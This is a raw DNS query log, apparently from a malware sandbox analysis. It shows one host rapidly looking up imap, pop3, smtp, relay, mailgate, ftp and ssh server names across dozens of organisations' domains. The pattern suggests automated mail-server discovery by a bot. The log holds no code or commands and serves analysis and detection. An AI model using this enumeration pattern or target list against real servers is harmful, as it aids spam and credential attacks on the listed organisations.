                                                                                                                                                                                                    Nov 26, 2023 06:59:40.579876900 CET192.168.2.41.1.1.10x42a0Standard query (0)imap.yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.580605984 CET192.168.2.41.1.1.10x2cedStandard query (0)imap.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.580764055 CET192.168.2.41.1.1.10x28dfStandard query (0)imap.xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.593323946 CET192.168.2.41.1.1.10x492eStandard query (0)imap.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.598215103 CET192.168.2.41.1.1.10x51afStandard query (0)mailgate.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.599230051 CET192.168.2.41.1.1.10x5385Standard query (0)pop3.2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.599397898 CET192.168.2.41.1.1.10x314eStandard query (0)imap.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.599503994 CET192.168.2.41.1.1.10xf6f0Standard query (0)pop3.xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.599766970 CET192.168.2.41.1.1.10x97bStandard query (0)imap.dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.608877897 CET192.168.2.41.1.1.10x2434Standard query (0)imap.kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.609353065 CET192.168.2.41.1.1.10x1473Standard query (0)imap.ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.609353065 CET192.168.2.41.1.1.10x74f7Standard query (0)imap.highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.610101938 CET192.168.2.41.1.1.10x7898Standard query (0)imap.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.611471891 CET192.168.2.41.1.1.10xbe52Standard query (0)imap.y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.613234043 CET192.168.2.41.1.1.10xb203Standard query (0)pop3.yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.613413095 CET192.168.2.41.1.1.10x7cd0Standard query (0)imap.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.613579035 CET192.168.2.41.1.1.10x767cStandard query (0)imap.gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.613579035 CET192.168.2.41.1.1.10x7101Standard query (0)pop3.carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.622200966 CET192.168.2.41.1.1.10x44f3Standard query (0)relay.member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.623821020 CET192.168.2.41.1.1.10x9407Standard query (0)pop3.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.626439095 CET192.168.2.41.1.1.10xd9a8Standard query (0)pop3.highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.628698111 CET192.168.2.41.1.1.10x7a3Standard query (0)pop3.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.628698111 CET192.168.2.41.1.1.10x2331Standard query (0)pop3.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.628993034 CET192.168.2.41.1.1.10xd39Standard query (0)pop.privatemoe.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.629810095 CET192.168.2.41.1.1.10x5c65Standard query (0)pop3.y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.630172014 CET192.168.2.41.1.1.10x854cStandard query (0)pop3.ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.630255938 CET192.168.2.41.1.1.10x12a4Standard query (0)pop3.mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.630486012 CET192.168.2.41.1.1.10xf532Standard query (0)pop3.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.630593061 CET192.168.2.41.1.1.10xf98fStandard query (0)pop3.dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.630789995 CET192.168.2.41.1.1.10x5d84Standard query (0)pop3.gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.630984068 CET192.168.2.41.1.1.10xf99aStandard query (0)pop3.kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.650607109 CET192.168.2.41.1.1.10x34a8Standard query (0)relay.gstudent.ctu.edu.vnA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.683810949 CET192.168.2.41.1.1.10x3d06Standard query (0)mailgate.schmith.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.685060978 CET192.168.2.41.1.1.10x5b74Standard query (0)pop3.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.011586905 CET192.168.2.41.1.1.10x6caeStandard query (0)ftp.prettypollycleaning.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.082866907 CET192.168.2.41.1.1.10xab5Standard query (0)mailgate.bosworthacademy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.391621113 CET192.168.2.41.1.1.10x1b34Standard query (0)imap.privatemoe.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.391793966 CET192.168.2.41.1.1.10xeb99Standard query (0)mailgate.yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.393069983 CET192.168.2.41.1.1.10x98f7Standard query (0)mailgate.sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.399569988 CET192.168.2.41.1.1.10x6deaStandard query (0)mailgate.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.585895061 CET192.168.2.41.1.1.10x45aeStandard query (0)mailgate.2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.586711884 CET192.168.2.41.1.1.10xa0deStandard query (0)mailgate.highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.586711884 CET192.168.2.41.1.1.10x518bStandard query (0)ssh.upn.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.587073088 CET192.168.2.41.1.1.10x932Standard query (0)mailgate.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.591749907 CET192.168.2.41.1.1.10xc162Standard query (0)mailgate.kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.592086077 CET192.168.2.41.1.1.10x8693Standard query (0)mailgate.ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.592086077 CET192.168.2.41.1.1.10x69adStandard query (0)mailgate.mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.807956934 CET192.168.2.41.1.1.10xc18eStandard query (0)mailgate.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.808789968 CET192.168.2.41.1.1.10x634aStandard query (0)mailgate.xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.811047077 CET192.168.2.41.1.1.10xad4bStandard query (0)mailgate.y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.811577082 CET192.168.2.41.1.1.10x5ac1Standard query (0)mailgate.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.811897993 CET192.168.2.41.1.1.10x99dcStandard query (0)mailgate.carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.815608025 CET192.168.2.41.1.1.10x7f5Standard query (0)mailgate.dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.817111015 CET192.168.2.41.1.1.10x27adStandard query (0)mailgate.gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.818104982 CET192.168.2.41.1.1.10xceebStandard query (0)pop3.privatemoe.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.954334974 CET192.168.2.41.1.1.10xe951Standard query (0)relay.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.982916117 CET192.168.2.41.1.1.10xbb15Standard query (0)relay.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.004592896 CET192.168.2.41.1.1.10x2c2bStandard query (0)smtp.sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.031464100 CET192.168.2.41.1.1.10xf1d7Standard query (0)relay.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.031464100 CET192.168.2.41.1.1.10xedc4Standard query (0)relay.highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.031755924 CET192.168.2.41.1.1.10xb63eStandard query (0)relay.yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.032608986 CET192.168.2.41.1.1.10x269fStandard query (0)relay.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.032685041 CET192.168.2.41.1.1.10x8fc2Standard query (0)relay.2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.033289909 CET192.168.2.41.1.1.10xe13Standard query (0)relay.sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.034672022 CET192.168.2.41.1.1.10x485aStandard query (0)smtp.yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.034761906 CET192.168.2.41.1.1.10xb99cStandard query (0)smtp.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.044533014 CET192.168.2.41.1.1.10x10c0Standard query (0)relay.kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.059465885 CET192.168.2.41.1.1.10x335fStandard query (0)relay.ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.061115980 CET192.168.2.41.1.1.10xd6caStandard query (0)relay.mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.065248013 CET192.168.2.41.1.1.10x2dafStandard query (0)smtp.kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.066646099 CET192.168.2.41.1.1.10x9e2eStandard query (0)smtp.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.066673994 CET192.168.2.41.1.1.10x3dcaStandard query (0)smtp.2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.067106962 CET192.168.2.41.1.1.10x7c11Standard query (0)smtp.carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.067106962 CET192.168.2.41.1.1.10x2bdeStandard query (0)smtp.mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.067490101 CET192.168.2.41.1.1.10xb14bStandard query (0)smtp.ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.068067074 CET192.168.2.41.1.1.10x3790Standard query (0)relay.y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.068502903 CET192.168.2.41.1.1.10xbbc6Standard query (0)smtp.gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.068502903 CET192.168.2.41.1.1.10xc48dStandard query (0)relay.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.074101925 CET192.168.2.41.1.1.10x1af7Standard query (0)relay.dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.074204922 CET192.168.2.41.1.1.10x624aStandard query (0)smtp.dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.078380108 CET192.168.2.41.1.1.10xac65Standard query (0)smtp.highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.079497099 CET192.168.2.41.1.1.10xa4e7Standard query (0)smtp.y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.079983950 CET192.168.2.41.1.1.10x3335Standard query (0)smtp.bosworthacademy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.081428051 CET192.168.2.41.1.1.10x72c2Standard query (0)smtp.foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.083070040 CET192.168.2.41.1.1.10x38e0Standard query (0)relay.gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.083996058 CET192.168.2.41.1.1.10x7d16Standard query (0)relay.xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.087837934 CET192.168.2.41.1.1.10x606eStandard query (0)relay.bosworthacademy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.088063955 CET192.168.2.41.1.1.10xf74cStandard query (0)smtp.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.090045929 CET192.168.2.41.1.1.10xa3b6Standard query (0)smtp.xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.092720985 CET192.168.2.41.1.1.10xea01Standard query (0)relay.carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.093405008 CET192.168.2.41.1.1.10x35eaStandard query (0)mailgate.privatemoe.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.242587090 CET192.168.2.41.1.1.10x55c2Standard query (0)relay.bunasta.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.401036024 CET192.168.2.41.1.1.10xba4Standard query (0)smtp.member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.590807915 CET192.168.2.41.1.1.10x518bStandard query (0)ssh.upn.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.672008991 CET192.168.2.41.1.1.10xbde0Standard query (0)cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.673719883 CET192.168.2.41.1.1.10xc236Standard query (0)relay.schmith.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.674035072 CET192.168.2.41.1.1.10xe18eStandard query (0)relay.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.930421114 CET192.168.2.41.1.1.10xa404Standard query (0)relay.privatemoe.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.951107025 CET192.168.2.41.1.1.10xa847Standard query (0)mail.cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.984693050 CET192.168.2.41.1.1.10x5ef0Standard query (0)smtp.privatemoe.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.203206062 CET192.168.2.41.1.1.10x2a8bStandard query (0)pop.cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.239919901 CET192.168.2.41.1.1.10x6ccfStandard query (0)mx2.emailsrvr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.298486948 CET192.168.2.41.1.1.10x3dc5Standard query (0)mx2.supremebox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.409152985 CET192.168.2.41.1.1.10x3900Standard query (0)pop3.cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.640444994 CET192.168.2.41.1.1.10xa17aStandard query (0)ftp.edgewater.groupA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.706727982 CET192.168.2.41.1.1.10xd1b8Standard query (0)mailgate.cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.245140076 CET192.168.2.41.1.1.10xf179Standard query (0)mx01.1and1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.246599913 CET192.168.2.41.1.1.10x3eabStandard query (0)krkconcord-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.246885061 CET192.168.2.41.1.1.10xfeb1Standard query (0)ftp.rochester-gauges.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.253922939 CET192.168.2.41.1.1.10xb683Standard query (0)jamiesonmullin-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.277952909 CET192.168.2.41.1.1.10x9ca8Standard query (0)relay.cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.426575899 CET192.168.2.41.1.1.10x1c1aStandard query (0)ftp.viidelta.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.452864885 CET192.168.2.41.1.1.10xf369Standard query (0)imap.cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.718004942 CET192.168.2.41.1.1.10xa5a5Standard query (0)ibright-net.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.722269058 CET192.168.2.41.1.1.10xa57dStandard query (0)gethsemane-org.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.722269058 CET192.168.2.41.1.1.10x2c75Standard query (0)rochestergauges-be02c.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.853709936 CET192.168.2.41.1.1.10xe589Standard query (0)talentius-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:45.202531099 CET192.168.2.41.1.1.10x9bfaStandard query (0)my-calvary-qld-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:46.285432100 CET192.168.2.41.1.1.10x1d74Standard query (0)mx2.jimdo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:46.546595097 CET192.168.2.41.1.1.10xb3adStandard query (0)mail.edgewater.groupA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.070449114 CET192.168.2.41.1.1.10xa43cStandard query (0)ftp.wasserman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.114037991 CET192.168.2.41.1.1.10xde8dStandard query (0)aoiit-store.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.122745991 CET192.168.2.41.1.1.10x36d7Standard query (0)jamiesonmullin-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.125180960 CET192.168.2.41.1.1.10x121dStandard query (0)octetpowers-in.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.126768112 CET192.168.2.41.1.1.10x615Standard query (0)krkconcord-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.127095938 CET192.168.2.41.1.1.10x296aStandard query (0)avient-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.163759947 CET192.168.2.41.1.1.10x7155Standard query (0)ftp.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.170963049 CET192.168.2.41.1.1.10xe2f4Standard query (0)ftp.federwild.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.171210051 CET192.168.2.41.1.1.10xaca9Standard query (0)ftp.awb-apparatebau.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.174158096 CET192.168.2.41.1.1.10xf794Standard query (0)ecolandeck-at0i.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.174158096 CET192.168.2.41.1.1.10x1757Standard query (0)gethsemane-org.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.174474955 CET192.168.2.41.1.1.10x19deStandard query (0)esoft-academy.mail.eo.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.188083887 CET192.168.2.41.1.1.10x223Standard query (0)ibright-net.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.192105055 CET192.168.2.41.1.1.10x5465Standard query (0)rochestergauges-be02c.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.193849087 CET192.168.2.41.1.1.10xf32Standard query (0)directlendersllc-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.206979990 CET192.168.2.41.1.1.10x51b9Standard query (0)greenrworld-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.208251953 CET192.168.2.41.1.1.10x894eStandard query (0)rechagricola-com-br.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.208692074 CET192.168.2.41.1.1.10xc03bStandard query (0)gmailvz-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.229676008 CET192.168.2.41.1.1.10xcf29Standard query (0)celogic-com0e.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.234502077 CET192.168.2.41.1.1.10x9508Standard query (0)chandigarhuniversityazure.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.244573116 CET192.168.2.41.1.1.10xa1deStandard query (0)grg17geblergasse-at.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.249329090 CET192.168.2.41.1.1.10x8ab0Standard query (0)engelfirm-com01c.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.253938913 CET192.168.2.41.1.1.10xf38dStandard query (0)ceuandalucia-es.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.260962009 CET192.168.2.41.1.1.10xd79bStandard query (0)mx4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.272789955 CET192.168.2.41.1.1.10x7dcStandard query (0)talentius-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.277371883 CET192.168.2.41.1.1.10xf13cStandard query (0)c47ab644ec7e3f14.mx1.emailprofi.seznam.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.279751062 CET192.168.2.41.1.1.10x850aStandard query (0)my-calvary-qld-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.281486034 CET192.168.2.41.1.1.10x401Standard query (0)mx.a.locaweb.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.284130096 CET192.168.2.41.1.1.10xa599Standard query (0)upn-pe.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.298974037 CET192.168.2.41.1.1.10x5015Standard query (0)killicit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:01.030069113 CET192.168.2.41.1.1.10x419aStandard query (0)ssh.hmichaelandco.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:01.146588087 CET192.168.2.41.1.1.10xf8e8Standard query (0)ssh.viidelta.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:01.178982019 CET192.168.2.41.1.1.10x8aa1Standard query (0)ssh.rochester-gauges.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:04.207107067 CET192.168.2.41.1.1.10x871cStandard query (0)ftp.bunasta.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:04.208497047 CET192.168.2.41.1.1.10x3726Standard query (0)ssh.bunasta.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:04.223141909 CET192.168.2.41.1.1.10x3b86Standard query (0)ssh.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:04.223577023 CET192.168.2.41.1.1.10x8b2aStandard query (0)ssh.awb-apparatebau.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:04.329996109 CET192.168.2.41.1.1.10x19feStandard query (0)mail.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:04.670438051 CET192.168.2.41.1.1.10x467bStandard query (0)mail.webstamp.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:04.745280981 CET192.168.2.41.1.1.10xe593Standard query (0)pop.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.080352068 CET192.168.2.41.1.1.10xade4Standard query (0)pop3.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.142398119 CET192.168.2.41.1.1.10xd94bStandard query (0)ftp.mdystudent.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.142398119 CET192.168.2.41.1.1.10xf86fStandard query (0)ftp.midcapfunding.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.183862925 CET192.168.2.41.1.1.10x6d5Standard query (0)ftp.esoft.academyA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.204688072 CET192.168.2.41.1.1.10xc00eStandard query (0)ftp.gmailvz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.250149965 CET192.168.2.41.1.1.10x62e0Standard query (0)ftp.robinsonland.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.250710964 CET192.168.2.41.1.1.10x9f87Standard query (0)ftp.svenssonfriends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.253602028 CET192.168.2.41.1.1.10x9524Standard query (0)ftp.leeberg.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.254118919 CET192.168.2.41.1.1.10x2362Standard query (0)ftp.nyklawfirm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.259954929 CET192.168.2.41.1.1.10xbe72Standard query (0)ftp.quipuapp.comA (IP address)IN (0x0001)false
